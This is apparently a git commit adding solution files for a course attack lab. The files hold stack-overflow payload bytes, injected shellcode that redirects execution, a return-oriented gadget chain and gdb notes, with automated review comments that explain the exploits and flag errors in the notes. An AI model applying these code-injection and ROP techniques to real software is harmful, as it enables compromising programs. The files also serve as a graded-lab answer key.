| author | Mike Vink <mike@pionative.com> | 2024-07-09 09:06:58 +0200 |
|---|---|---|
| committer | Mike Vink <mike@pionative.com> | 2024-07-09 09:06:58 +0200 |
| commit | 7ae6aa6a64f3f697edb90bb573862bf31dd14e69 (patch) | |
| tree | e80f43394fd5814e30f98a7faa189f8f49424681 /labs/attacklab/solution | |
| parent | 8092f4c334db547ced59d6f439b558dad35e1ab2 (diff) | |
chapter 3: reading excercises + attacklab
Diffstat (limited to 'labs/attacklab/solution')
| -rw-r--r-- | labs/attacklab/solution/ctarget.1.txt | 1 | ||||
| -rw-r--r-- | labs/attacklab/solution/ctarget.2.txt | 2 | ||||
| -rw-r--r-- | labs/attacklab/solution/ctarget.3.txt | 1 | ||||
| -rw-r--r-- | labs/attacklab/solution/ctarget.4.txt | 9 | ||||
| -rw-r--r-- | labs/attacklab/solution/farm.yaml | 35 | ||||
| -rw-r--r-- | labs/attacklab/solution/set_cookie.s | 3 | ||||
| -rw-r--r-- | labs/attacklab/solution/stack.c | 27 |
7 files changed, 78 insertions, 0 deletions
diff --git a/labs/attacklab/solution/ctarget.1.txt b/labs/attacklab/solution/ctarget.1.txt
new file mode 100644
index 0000000..2779c46
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.1.txt
@@ -0,0 +1 @@
+ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de c0 17 40 00 00 00 00 00
diff --git a/labs/attacklab/solution/ctarget.2.txt b/labs/attacklab/solution/ctarget.2.txt
new file mode 100644
index 0000000..fb116d2
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.2.txt
@@ -0,0 +1,2 @@
+bf fa 97 b9 59 68 ec 17 40 00 c3 de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de 78 dc 61 55 00 00 00 00
+
diff --git a/labs/attacklab/solution/ctarget.3.txt b/labs/attacklab/solution/ctarget.3.txt
new file mode 100644
index 0000000..0cdf60c
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.3.txt
@@ -0,0 +1 @@
+48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 00 00 00 00 00 00 00 00 00 ad de ef be ad de ef be ad de ef be ad de ef be ad de 78 dc 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00
diff --git a/labs/attacklab/solution/ctarget.4.txt b/labs/attacklab/solution/ctarget.4.txt
new file mode 100644
index 0000000..d322873
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.4.txt
@@ -0,0 +1,9 @@
+ef be ad de ef be ad de /* rsp - 40 */
+ef be ad de ef be ad de /* rsp - 32 */
+ef be ad de ef be ad de /* rsp - 24 */
+ef be ad de ef be ad de /* rsp - 16 */
+ef be ad de ef be ad de /* rsp - 8 */
+ab 19 40 00 00 00 00 00 /* return address: call addval_219+4 */
+fa 97 b9 59 00 00 00 00 /* cookie: popped into rax */
+a2 19 40 00 00 00 00 00 /* return address: call addval_273+2 */
+ec 17 40 00 00 00 00 00 /* return address: call touch2 */
diff --git a/labs/attacklab/solution/farm.yaml b/labs/attacklab/solution/farm.yaml
new file mode 100644
index 0000000..d425028
--- /dev/null
+++ b/labs/attacklab/solution/farm.yaml
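Review bot: The only meaningful bytes in this payload, `c0 17 40 00 00 00 00 00`, carry no annotation, while ctarget.4.txt in the same commit labels every 8-byte slot with a `/* ... */` comment (so the raw-conversion step evidently tolerates them). Adding `/* 40 bytes of filler for getbuf's buffer */` after the padding and `/* overwritten return address: 0x4017c0 */` after the address would make the file self-explaining. The stack.c notes call 0x4017c0 "call getbuf", but as the value written into the return slot it is where getbuf returns to, not a call into it; naming the actual target function (touch1, if that is what the disassembly shows) would avoid the confusion.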
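Review bot: The placement of the cookie string is the one non-obvious decision in this payload and it is undocumented. The first 13 bytes are the assembled set_cookie.s (`movq $0x5561dca8,%rdi; pushq $0x4018fa; ret`), the next 27 bytes pad the 40-byte buffer, `78 dc 61 55 00 00 00 00` redirects getbuf's return into the buffer, and the trailing `35 39 62 39 39 37 66 61 00` is "59b997fa\0" at buffer+48 = 0x5561dca8 — exactly the address loaded into %rdi. Because that offset lies above the overwritten return slot, the string sits in the caller's frame rather than inside getbuf's buffer, which is presumably why it survives the stack use of the function entered next (the earlier attempt recorded in stack.c kept the string inside the buffer). A trailing `/* "59b997fa\0" at 0x5561dca8, past the return address */` would record that.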
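Review bot: The file is named ctarget.4.txt, but its contents are a return-oriented chain assembled from the gadget offsets in farm.yaml (0x4019ab → `popq %rax`, 0x4019a2 → `movq %rax,%rdi`, then touch2 at 0x4017ec) rather than injected code, which presumably means it is meant for the rtarget binary; renaming it rtarget.4.txt, or adding `/* rtarget phase 4: pop cookie into rax, move to rdi, return into touch2 */` as a first line, would keep it from being mistaken for a fourth ctarget payload. The chain itself is consistent with farm.yaml: the slot `fa 97 b9 59 00 00 00 00` is little-endian 0x59b997fa and is consumed by the `popq %rax` gadget the preceding return address reaches.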
@@ -0,0 +1,35 @@
+getval_142:
+ 3: |
+ nop
+ nop
+ ret
+
+addval_273:
+ 2: |
+ movq %rax, %rdi
+ ret
+ 3: |
+ movl %eax, %edi
+ ret
+
+addval_219:
+ 4: |
+ popq %rax
+ nop
+ ret
+
+# 00 00 00 00 00 40 17 ec // return address: call touch2
+# 00 00 00 00 00 40 19 a2 // return address: call addval_273+2
+# 00 00 00 00 a8 dc 61 55 // cookie: popped into rax
+# 00 00 00 00 00 40 19 ab // return address: call addval_219+4
+# ef be ad de ef be ad de // rsp - 8
+# ef be ad de ef be ad de // rsp - 16
+# ef be ad de ef be ad de // rsp - 24
+# ef be ad de ef be ad de // rsp - 32
+# ef be ad de ef be ad de // rsp - 40
+
+setval_237:
+
+setval_424:
+
+
diff --git a/labs/attacklab/solution/set_cookie.s b/labs/attacklab/solution/set_cookie.s
new file mode 100644
index 0000000..f11f435
--- /dev/null
+++ b/labs/attacklab/solution/set_cookie.s
@@ -0,0 +1,3 @@
+movq $0x5561dca8,%rdi
+pushq $0x00000000004018fa
+ret
diff --git a/labs/attacklab/solution/stack.c b/labs/attacklab/solution/stack.c
new file mode 100644
index 0000000..1c9002f
--- /dev/null
+++ b/labs/attacklab/solution/stack.c
@@ -0,0 +1,27 @@
+// 00 00 00 00 00 00 00 00 // free space: int val
+// 00 00 00 00 00 40 17 c0 // return address: call getbuf
+// ef be ad de ef be ad de // rsp - 8
+// ef be ad de ef be ad de // rsp - 16
+// ef be ad de ef be ad de // rsp - 24
+// ef be ad de ef be ad de // rsp - 32
+// ef be ad de ef be ad de // rsp - 40
+
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+40 17 c0 00 00 00 00 00
+
+
+0x5561dc78: 0x17ec6859b997fabf 0xdeadbeefdec30040
+0x5561dc88: 0xdeadbeefdeadbeef 0xdeadbeefdeadbeef
+0x5561dc98: 0xdeadbeefdeadbeef 0x0000000000000000
+
+59 b9 97 fa
+
+006166373939623935
+
+0x5561dc78: 0xdeadbeefdeadbeef 0xdeadbeefdeadbeef
+0x5561dc88: 0xdeadbeefdeadbeef 0x35adbeefdeadbeef
+0x5561dc98: 0x0061663739396239 0x000000005561dc78 |
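Review bot: The commented stack layout puts the wrong value in the cookie slot: `# 00 00 00 00 a8 dc 61 55 // cookie: popped into rax` shows 0x5561dca8, which is the phase-3 string address used in set_cookie.s, not the cookie; the committed ctarget.4.txt pops `fa 97 b9 59 00 00 00 00`, i.e. 0x59b997fa. Change it to `# 00 00 00 00 59 b9 97 fa // cookie: popped into rax`, and since this block writes values big-endian while the .txt payloads are little-endian, a remark such as `# values shown big-endian; the .txt payloads store them little-endian` would prevent a copy-paste of these lines from producing a reversed address. The gadget entries appear to be keyed by byte offset into each farm function (`addval_219: 4:` → `popq %rax; nop; ret`), which deserves a header comment so the numbers are not read as gadget counts. The empty `setval_237:` and `setval_424:` keys parse as YAML null; if they are placeholders for functions with no usable gadget, a `# no usable gadget found` comment would say so.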
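Review bot: The file has no header stating syntax, purpose or target, and its name is misleading: it does not set the cookie, it loads the address of the cookie string (0x5561dca8, the slot ctarget.3.txt fills with "59b997fa\0") into %rdi and transfers control to 0x4018fa via push/ret, and its assembled bytes `48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3` are the first 13 bytes of ctarget.3.txt. A header such as `# ctarget phase 3 (AT&T syntax): rdi = &"59b997fa" in the caller's frame, then push/ret into touch3 at 0x4018fa` would tie the two files together. `pushq $0x00000000004018fa` cannot take a 64-bit immediate; the assembler accepts it only because the value fits a sign-extended 32-bit immediate, so `pushq $0x4018fa` states what is actually encoded. Both hard-coded addresses work only because the target's stack is at a fixed address and executable — presumably the ctarget build disables stack randomization and leaves the stack executable — so a comment noting that this shellcode is bound to that one binary would stop anyone treating it as reusable.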
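Review bot: The payload sketch's last line `40 17 c0 00 00 00 00 00` has the address in the wrong byte order: the committed ctarget.1.txt ends with `c0 17 40 00 00 00 00 00` (little-endian 0x4017c0), whereas these bytes would decode to 0x00000000c01740, so the notes and the submitted payload disagree. The label `// return address: call getbuf` is also misleading — 0x4017c0 is the value written into getbuf's return slot, i.e. the function getbuf returns into (touch1, if the disassembly confirms it), not a call to getbuf; `// return slot overwritten with touch1 (0x4017c0)` would be accurate. The file holds hex dumps and gdb output rather than C, so a .txt or .md name (e.g. notes.md) would keep editors and tooling from treating it as source. The second dump shows "59b997fa\0" landing at 0x5561dc8f–0x5561dc97, inside the 40-byte buffer, which the final ctarget.3.txt moves to 0x5561dca8; a one-line remark recording why the string had to move would make these notes useful to a later reader.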
